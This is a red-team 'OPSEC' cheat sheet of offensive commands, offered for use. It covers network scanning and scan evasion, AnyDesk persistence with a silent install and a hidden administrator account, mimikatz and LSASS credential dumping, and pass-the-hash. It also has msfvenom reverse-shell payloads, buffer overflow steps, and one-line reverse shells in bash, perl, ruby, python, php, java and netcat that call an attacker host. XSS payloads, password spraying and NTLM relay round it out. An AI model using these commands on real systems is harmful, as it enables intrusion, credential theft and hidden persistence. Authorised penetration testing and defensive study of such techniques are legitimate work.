Red Team and OPSEC - 2023 Edition

The quieter you become, the more you are able to hear 🥷

Basic System Info

Hotfix Information

User & Group Information

Network Details

Privilege Information

Process & Service Details

Network Connections

Directory Access

Domain & Forest Info (PowerShell)

Domain Controller and Trusts

Authentication & Session Details

Miscellaneous

Host Discovery

Discover alive hosts in a network. - $ nmap -sn -T4 -oG Discovery.gnmap 192.168.1.1/24: Ping scan, no port scan. - $ grep “Status: Up” Discovery.gnmap | cut -f 2 -d ‘ ‘ > LiveHosts.txt: Extract live hosts from the results.

Top Ports Scan

Identify most commonly used ports. - $ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt: TCP SYN scan. - $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt: UDP scan.

Full Range Port Scan

Full range port scanning; UDP might be slow. - $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt: Common 3674 TCP ports. - $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt: All TCP ports. - $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt: All UDP ports.

Extract Open Ports

Commands to extract and display open TCP and UDP ports. - $ grep “open” FullTCP | cut -f 1 -d ‘ ‘ | sort -nu | cut -f 1 -d ‘/’ | xargs | sed ‘s/ /,/g’ | awk ‘{print “T:”$0}’ - $ grep “open” FullUDP | cut -f 1 -d ‘ ‘ | sort -nu | cut -f 1 -d ‘/’ | xargs | sed ‘s/ /,/g’ | awk ‘{print “U:”$0}’

Service and OS Detection

Identify services running and OS details. - $ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt: Service detection. - $ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt: OS detection. - $ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt: Combined OS and service detection for specific ports.

Evasion Techniques

Methods to avoid firewalls or obfuscate scan origin.

Segmentation

MTU Manipulation

Decoy Scanning

Make it appear the scan is coming from other hosts. - $ nmap -D RND:10 [target]: Randomized decoy scan. - $ nmap -D decoy1,decoy2,decoy3 [target]: Manually specify decoys.

Zombie Host Scanning

Use idle hosts to mask scan origin. - $ nmap -sI [Zombie IP] [Target IP]: Idle scan using a specific zombie.

Specified Source Port

AnyDesk OPSEC Usage

This outlines the usage of AnyDesk, a commercial remote access tool utilized by threat actors for browsing victim host file systems, deploying payloads, and data exfiltration.

Downloading and Installing AnyDesk:

  1. Download AnyDesk Executable:
  2. Download the AnyDesk executable using PowerShell.
  3. Example PowerShell Script:

      Invoke-WebRequest -Uri <AnyDesk_Download_URL> -OutFile 'C:\ProgramData\AnyDesk.exe'
    

  4. Silent Installation and Password Configuration:

  5. Silently install AnyDesk and set an access password.
  6. Commands:
      cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
      cmd.exe /c echo <Your_Password> | C:\ProgramData\AnyDesk.exe --set-password
    

Configuring Additional Administrator Account:

  1. Create an Additional Administrator Account:
  2. Add an administrator account with a password.
  3. Command:

      net user <Username> "<Password>" /add
    

  4. Add Account to Administrators Group:

  5. Include the new administrator account in the Administrators group.
  6. Command:

      net localgroup Administrators <Username> /ADD
    

  7. Hide Account from Login Screen:

  8. Prevent the account from appearing on the login screen.
  9. Command:
      reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v <Username> /t REG_DWORD /d 0 /f
    

Gaining Remote Access with AnyDesk:

  1. Execute AnyDesk with Get-ID Parameter:
  2. Launch AnyDesk with the --get-id parameter to enable remote access.
  3. Command:
      cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
    

Web Path Scanner and Brute Force Tools

Web Path Scanners:

1. dirsearch

2. DirBuster

3. Patator (Password Guessing)

Brute Force with Patator:

$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst
$ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name'

DNS Enumeration with Fierce:

Web Service Scanning with Nikto:

WordPress Scan with WPScan:

HTTP Fingerprint Identification with Httprint:

Web Application Security Scanning with Skipfish:

Network Scanning and Enumeration:

NC (Netcat) Scan:

# Basic port scan on 'target'
nc -v -w 1 target -z 1-1000

# Port scan range on a set of IP addresses
for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done

Unicornscan:

# Unicornscan for information gathering and security audits
# Scanning for all ports and services (TCP and UDP)
us -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535

Xprobe2 for OS Fingerprinting:

# Identify the operating system fingerprint on 'IP'
xprobe2 -v -p tcp:80:open IP

Enumeration and Windows Commands:

Samba Enumeration:

# Enumeration of Samba services on 'target'
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

SNMP Enumeration:

# Enumerating SNMP on 'IP' using different commands
snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP

Windows Commands:

# Various Windows command-line operations
net localgroup Users
net localgroup Administrators
search dir/s *.doc
system("start cmd.exe /k $cmd")
sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp 32
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp 64

Tunneling and Port Forwarding:

PuTTY Remote Port Forwarding:

# Forward the remote port to the destination address using PuTTY
plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP

Meterpreter Port Forwarding:

# Meterpreter port forwarding for remote access
# For detailed usage, refer to https://www.offensive-security.com/metasploit-unleashed/portfwd/
meterpreter > portfwd add -l 3389 -p 3389 -r 172.16.194.141
kali > rdesktop 127.0.0.1:3389

Enabling RDP and Firewall Manipulation:

# Enable the RDP service and configure firewall settings
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

# Close Windows Firewall
netsh firewall set opmode disable

Meterpreter VNC/RDP:

# Enabling VNC/RDP with Meterpreter
# For detailed usage, refer to https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/
run getgui -u admin -p 1234
run vnc -p 5043

Using Mimikatz:

# Using Mimikatz to retrieve Windows plaintext user name and password
git clone https://github.com/gentilkiwi/mimikatz.git
privilege::debug
sekurlsa::logonPasswords full

Password Hash Gathering and Cracking

Gathering Password Hash:

Using pth-toolkit and pth-winexe:

# Clone pth-toolkit and retrieve a shell using the hash
git clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash //IP cmd

Using xfreerdp:

# Install freerdp-x11 and connect using a hash
apt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP

Using Meterpreter:

# Use Meterpreter to gather hashes
meterpreter > run post/windows/gather/hashdump

Exploiting Hash to Gain Access:

Using Metasploit psexec:

# Set up a Meterpreter reverse shell using the hash
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set SMBPass HASH
msf exploit(psexec) > exploit
meterpreter > shell

Password Cracking with Hashcat:

Using Hashcat:

# Crack passwords using Hashcat
hashcat -m 400 -a 0 hash /root/rockyou.txt

Using Netcat (NC) for Shell Bouncing on Windows

Listening and Connecting with NC:

Setting Up a Listener:

# Windows: Listen on port 31337 and execute cmd.exe
c:> nc -Lp 31337 -vv -e cmd.exe

Connecting to the Listener:

# Connect to the Windows listener on IP and port 31337
nc 192.168.0.10 31337

Executing Shell on a Remote Host:

# Execute cmd.exe on a remote host via NC
c:> nc example.com 80 -e cmd.exe

Setting Up a Listener on Port 80:

# Listen on port 80
nc -lp 80

Advanced NC Options:

Bouncing Shell with /bin/bash:

# Bounce a shell on Windows using /bin/bash
nc -lp 31337 -e /bin/bash

Randomize Output and Wait:

# Randomize output and wait for 1 second before exiting
nc -vv -r -w 1 192.168.0.10 -z 1-1000

Finding SUID/SGID and Orphaned Files

Locate SUID root files:

# Search for SUID root files
find / -user root -perm -4000 -print

Locate SGID root files:

# Search for SGID root files
find / -group root -perm -2000 -print

Locate SUID and SGID files:

# Search for both SUID and SGID files
find / -perm -4000 -o -perm -2000 -print

Find files that do not belong to any user:

# Search for files without an assigned user
find / -nouser -print

Locate files that do not belong to any user group:

# Search for files without an assigned user group
find / -nogroup -print
# Search for symbolic links and show their targets
find / -type l -ls

Python Shell Escalation:

# Escalate to a Python shell
python -c 'import pty;pty.spawn("/bin/bash")'

Python, Ruby, and PHP HTTP Servers:

Python 2 HTTP Server:

# Start a Python 2 HTTP server
python2 -m SimpleHTTPServer

Python 3 HTTP Server:

# Start a Python 3 HTTP server
python3 -m http.server

Ruby HTTP Server (WEBrick):

# Start a Ruby WEBrick HTTP server on port 8888
ruby -rwebrick -e 'WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start'

PHP HTTP Server:

# Start a PHP HTTP server on IP 0.0.0.0 and port 8888
php -S 0.0.0.0:8888

Getting Process PID:

Find PID for a Port:

# Get the PID for a process using port 80
fuser -nv tcp 80

Kill a Process by Port:

# Kill the process using port 80
fuser -k -n tcp 80

Using Hydra to Crack RDP:

# Use Hydra to crack RDP with a username list and password file
hydra -l admin -P /root/Desktop/passwords -t 1 -vV -f -o hydra_output.txt rdp://X.X.X.X

Mounting a Remote Windows Shared Folder (SMB):

# Mount a remote Windows shared folder to /mnt/remote/
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw

Compiling an Exploit in Kali:

Compile a 32-bit Executable:

# Compile a 32-bit executable from hello.c
gcc -m32 -o output32 hello.c

Compile a 64-bit Executable:

# Compile a 64-bit executable from hello.c
gcc -m64 -o output hello.c

Compiling a Windows Exploit in Kali:

# Download and install MinGW
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
# Select mingw32-base during installation
# Navigate to the MinGW bin directory
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
# Compile the exploit.c to ability.exe with necessary libraries
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
# Execute the compiled Windows exploit
wine ability.exe

NASM (Netwide Assembler) Commands:

# Assemble an assembly source file to binary
nasm -f bin -o payload.bin payload.asm

# Assemble to ELF format and link, then display the disassembled code
nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload

SSH Penetration:

# SSH tunnel with dynamic port forwarding on local port 1080
ssh -D 127.0.0.1:1080 -p 22 user@IP

# Add SOCKS4 proxy configuration to /etc/proxychains.conf
# Append: socks4 127.0.0.1 1080

# Use proxychains to route commands through the SSH tunnel
proxychains commands target

# SSH penetration from one network to another, chaining multiple SSH connections

# First SSH tunnel with dynamic port forwarding
ssh -D 127.0.0.1:1080 -p 22 user1@IP1

# Add SOCKS4 proxy configuration to /etc/proxychains.conf
# Append: socks4 127.0.0.1 1080

# Second SSH tunnel with dynamic port forwarding through the first tunnel
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2

# Add SOCKS4 proxy configuration to /etc/proxychains.conf
# Append: socks4 127.0.0.1 1081

# Use proxychains to route commands through the second SSH tunnel
proxychains commands target

Using Metasploit for Penetration

Metasploit is a powerful penetration testing tool that provides a wide range of functionalities for identifying vulnerabilities and executing exploits. Here are some useful Metasploit commands and techniques:

  1. IP Configuration and Routing:
  2. Description: Obtain the IP address of the compromised system, configure routing, and pivot through it.

      meterpreter > ipconfig
      IP Address: 10.1.13.3
      meterpreter > run autoroute -s 10.1.13.0/24
      meterpreter > run autoroute -p
      10.1.13.0 255.255.255.0 Session 1
    

  3. Exploiting Remote Systems:

  4. Description: Exploit a remote Windows system using the SMB psexec exploit module.

      meterpreter > Ctrl+Z
      msf auxiliary(tcp) > use exploit/windows/smb/psexec
      msf exploit(psexec) > set RHOST 10.1.13.2
      msf exploit(psexec) > exploit
      meterpreter > ipconfig
      IP Address: 10.1.13.2
    

  5. Exploit-DB Search:

  6. Description: Search for exploits in the Exploit-DB database based on keywords or criteria.

      git clone https://github.com/offensive-security/exploit-database.git
      cd exploit-database
      ./searchsploit -u
      ./searchsploit apache 2.2
      ./searchsploit "Linux Kernel"
    

  7. Exploit-DB CSV Filtering:

  8. Description: Filter and search for specific exploits within the Exploit-DB CSV file.

      cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3
    

  9. MSF Payload Generation:

  10. Description: Generate various Metasploit payloads for different platforms and scenarios.

      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> -f exe > system.exe
      msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -f raw > exploit.php
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -f asp > file.asp
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -b "\x00" -f c
    

  11. MSF Payloads for Linux and Shellcode:

  12. Description: Generate payloads and shellcode for Linux and Windows.

      msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -f elf -a x86 > shell
      msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 -f c
    

  13. Other Payload Types:

  14. Description: Generate payloads for Python, ASP, Bash, and more.
      msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port> -f asp -a x86 > shell.asp
      msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port> -o shell.sh
      msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port> -o shell.php
      # Add '<?php' at the beginning and run: perl -i~ -0777pe's/^/<?php \n/' shell.php
      msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port> -f exe -a x86 > shell.exe
    

Linux commonly used security commands

find / -uid 0 -perm -4000

find / -perm -o=w

find / -name ” ” -print
find / -name “..” -print
find / -name “. ” -print
find / -name ” ” -print

find / -nouser

lsof +L1

lsof -i

arp -a

getent passwd

getent group

for user in $(getent passwd|cut -f1 -d:); do echo “### Crontabs for $user ####”; crontab -u $user -l; done

cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4

find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’
chattr -i file

Windows Buffer Overflow exploits

msfvenom -p windows/shell_bind_tcp -a x86 –platform win -b “\x00” -f c
msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 –platform win -e x86/shikata_ga_nai -b “\x00” -f c

COMMONLY USED BAD CHARACTERS:

\x00\x0a\x0d\x20 For http request
\x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_)

Regular command:

pattern create
pattern offset (EIP Address)
pattern offset (ESP Address)
add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )

!pvefindaddr pattern_create 5000
!pvefindaddr suggest
!pvefindaddr nosafeseh


!mona config -set workingfolder C:\Mona\%p

!mona config -get workingfolder
!mona mod
!mona bytearray -b “\x00\x0a”
!mona pc 5000
!mona po EIP
!mona suggest

SEH – Structured exception handling

Note: SEH (“Structured Exception Handling”), or structured exception handling, is a powerful processor error or exception weapon provided by the Windows operating system to the programmer.

# https://en.wikipedia.org/wiki/Microsoft-specific_exception_handling_mechanisms#SEH
# http://baike.baidu.com/view/243131.htm
!mona suggest
!mona nosafeseh
nseh=”\xeb\x06\x90\x90″ (next seh chain)
iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)

ROP (DEP)

Note: ROP (“Return-Oriented Programming”) is a computer security exploit technology that allows an attacker to execute code, such as un-executable memory and code signatures, in a security defense situation.

DEP (“Data Execution Prevention”) is a set of hardware and software technology, in memory, strictly to distinguish between code and data to prevent the data as code execution.

# https://en.wikipedia.org/wiki/Return-oriented_programming
# https://zh.wikipedia.org/wiki/%E8%BF%94%E5%9B%9E%E5%AF%BC%E5%90%91%E7%BC%96%E7%A8%8B
# https://en.wikipedia.org/wiki/Data_Execution_Prevention
# http://baike.baidu.com/item/DEP/7694630
!mona modules
!mona ropfunc -m *.dll -cpb “\x00\x09\x0a”
!mona rop -m *.dll -cpb “\x00\x09\x0a” (auto suggest)

ASLR – Address space format randomization

# https://en.wikipedia.org/wiki/Address_space_layout_randomization
!mona noaslr

EGG Hunter technology

Egg hunting This technique can be categorized as a “graded shellcode”, which basically supports you to find your actual (larger) shellcode (our “egg”) with a small, specially crafted shellcode, In search of our final shellcode. In other words, a short code executes first, then goes to the real shellcode and executes it. – Making reference to see Ice Forum , more details can be found in the code I add comments link.

# https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
# http://www.pediy.com/kssd/pediy12/116190/831793/45248.pdf
# http://www.fuzzysecurity.com/tutorials/expDev/4.html
!mona jmp -r esp
!mona egg -t lxxl
\xeb\xc4 (jump backward -60)
buff=lxxllxxl+shell
!mona egg -t ‘w00t’

GDB Debugger commonly used commands

break *_start
next
step
n
s
continue
c

Data

checking ‘REGISTERS’ and ‘MEMORY’

Display the register values: (Decimal,Binary,Hex)

print /d –> Decimal
print /t –> Binary
print /x –> Hex
O/P :
(gdb) print /d $eax
$17 = 13
(gdb) print /t $eax
$18 = 1101
(gdb) print /x $eax
$19 = 0xd
(gdb)

Display the value of a specific memory address

command : x/nyz (Examine)
n –> Number of fields to display ==>
y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)

BASH rebound Shell

bash -i >& /dev/tcp/X.X.X.X/443 0>&1

exec /bin/bash 0&0 2>&0
exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
exec 5<>/dev/tcp/attackerip/4444

cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done

/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
/bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1

PERL rebound Shell

perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:443″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

Win platform

perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

RUBY rebound Shell

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”443″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

Win platform

ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”443″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’
ruby -rsocket -e ‘f=TCPSocket.open(“attackerip”,”443″).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

PYTHON rebound Shell

python -c ‘import                                                 socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“attackerip”,443));os.dup2(s.fileno(),0);                 os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

PHP bounce Shell

php -r ‘$sock=fsockopen(“attackerip”,443);exec(“/bin/sh -i <&3 >&3 2>&3”);’

JAVA rebound Shell

r = Runtime.getRuntime()
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])
p.waitFor()

NETCAT rebound Shell

nc -e /bin/sh attackerip 4444
nc -e /bin/sh 192.168.37.10 443

If the -e parameter is disabled, you can try the following command

# mknod backpipe p && nc attackerip 443 0<backpipe | /bin/bash 1>backpipe
/bin/sh | nc attackerip 443
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/

If you installed the wrong version of netcat, try the following command

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f

TELNET rebound Shell

If netcat is not available

mknod backpipe p && telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe

XTERM rebound Shell

Enable the X server (: 1 – listen on TCP port 6001)

apt-get install xnest
Xnest :1

Remember to authorize the connection from the target IP

xterm -display 127.0.0.1:1

Grant access

xhost +targetip

Connect back to our X server on the target machine

xterm -display attackerip:1
/usr/openwin/bin/xterm -display attackerip:1
or
$ DISPLAY=attackerip:0 xterm

XSS

# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(“< iframes > src=http://IP:PORT </ iframes >”)

<script>document.location=http://IP:PORT</script>

‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

“;!–”<XSS>=&amp;amp;{()}

<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert(‘XSS’)>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>””>
<IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;>

<IMG                     SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041>
<IMG SRC=”jav ascript:alert(‘XSS’);”>

perl -e ‘print “<IMG SRC=javascript:alert(\”XSS\”)>”;’ > out

<BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

(“>< iframes http://google.com < iframes >)

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
“><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
<img src=asdf onerror=alert(document.cookie)>

SSH Over SCTP (using Socat)

$ socat SCTP-LISTEN:80,fork TCP:localhost:22
$ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80
$ ssh -lusername localhost -D 8080 -p 1337

Metagoofil – Metadata collection tool

Note: Metagoofil is a tool for collecting information using Google.
$ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html

Use a DNS tunnel to bypass the firewall

$ apt-get update
$ apt-get -y install ruby-dev git make g++
$ gem install bundler
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server
$ bundle install
$ ruby ./dnscat2.rb
dnscat2> New session established: 16059
dnscat2> session -i 16059

Red-Team and Infrastructure Assessments

External recon

https://github.com/dcsync/recontools

O365 bruting

python3 office365userenum.py -u test.txt -v -o output.txt --password 'Password1

Enumeration (opsec safe):

python o365creeper.py -f test.txt

https://github.com/0xZDH/o365spray

subdomain finder

https://spyse.com/

https://crt.sh %.blah.com

search categorized expired domain

python3 ./domainhunter.py -r 1000

Metadata

PS C:\> Invoke-PowerMeta -TargetDomain targetdomain.com

Domain User Enumeration

MailSniper

Usernameharvest

Invoke-UsernameHarvestOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Threads 1 -OutFile owa-valid-users.txt

Domainnameharvest

Invoke-DomainHarvestOWA -ExchHostname mail.domain.com

OWA Spray

Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt

Grab employee names from Linkedin

theharvester -d blah.com -l 1000 -b linkedin

https://github.com/m8r0wn/CrossLinked

Extract Linkedin details from snov.io

Regex to extract emails

grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b"

Extract from burp

cat linkedin.txt | tr , '\n' | sed 's/\”//g' | awk '/"title":{"textDirection":"FIRST_STRONG"/{getline; print}'

Change format to b.lah

awk '=FS tolower(substr(,1,1)$NF)' linkedin-user-list.txt | awk '{ print }'

awk '{print $0,tolower(substr($1,1,1)$NF)}' names.txt

Check usernames against AD:

Handy if you have generated a list from linkedin or a list of usernames.

nmap -p 88 1.1.1.1 --script krb5-enum-users --script-args krb5-enum-users.realm="DOMAIN"

username list is located at /usr/local/share/nmap/nselib/data/usernames.lst in Kali

Null sessions

Still works on infra that was upgraded from 2k, 2k3.

net use \\IP_ADDRESS\ipc$ "" /user:""

Use enum4linux, enum or Dumpsec following the null session setup.

GPP

https://bitbucket.org/grimhacker/gpppfinder/src/master/

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

situational awareness

https://github.com/dafthack/HostRecon

Privesc checks: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation

Network Attacks

Responder

Grab NetNTLM hashes off the network

Without wpad:

responder -I eth0

With wpad:

responder -I eth0 --wpad -b -f -F

Filter logs from logs folder and remove machine accounts:

sort -m *.txt | uniq -d | awk '!/\$/'

Cracking with John:

john SMB-NTLMv2-Client-172.20.22.217.txt --wordlist=/root/passwords.txt

Use hashcat on a more powerful box. This is only for easy wins.

NTLM Relaying

ntlmrelayx.py -tf targets.txt -c <insert Empire Powershell launcher>

MITM6

python mitm6.py -d blah.local

Capture hashes

impacket-smbserver hiya /tmp/ -smb2support

Bruteforce domain passwords

Common Passwords

$Company1 $Season$Year Password1 Password! Welcome1 Welcome! Welcome@123 P@55word P@55w0rd $month$year

Using hydra

hydra -L users.txt -p Password1 -m 'D' 172.20.11.55 smbnt -V

Bruteforce using net use

@FOR /F %n in (users.txt) DO @FOR /F %p in (pass.txt) DO @net use \\DOMAINCONTROLLER\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\DOMAINCONTROLLER\IPC$ > NUL

all systems

net view /domain > systems.txt

Local admin search using net use

@FOR /F %s in (systems.txt) DO @net use \\%s\C$ /user:domain\username Password 1>NUL 2>&1 && @echo %s>>admin_access.txt && @net use /delete \\%s\C$ > NUL

Domain joined machine

Invoke-DomainPasswordSpray -Password Spring2017

Non-domain joined testing

When you have an initial set of compromised creds run these from a Virtual Machine to place foothold on network as domain user.

Shell with domain user privileges

C:\runas.exe /netonly /user:BLAHDOMAIN\blahuser cmd.exe

runas /netonly /user:blah@blah.com "mmc %SystemRoot%\system32\dsa.msc

Make sure you use the FQDN of the domain and set the reg key as below.

check dc:

nltest /dsgetdc:domain.local

To change DC via registry to point at domain being tested:

HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services Netlogon Parameters “SiteName“ > DC1.domain.com

Create session for use with dumpsec

net use \\10.0.0.1\ipc$ /user:domain.local\username password

Quick User lists and password policy enum

net users /domain

net group /domain "Domain Admins"

net accounts /domain

Note that the above commands do not work with runas. Below PowerView functions will work with runas.

Powerview:

. .\PowerView.ps1

Get-UserProperty -Properties samaccountname

Get-NetGroupMember

Get-DomainPolicy

Search shares and files using Invoke-FileFinder and Invoke-ShareFinder

Domain Analysis

BloodHound

Run locally on non-domain joined machine (remember to add target domain to registry):

..\BloodHound.ps1

Invoke-BloodHound

SharpHound

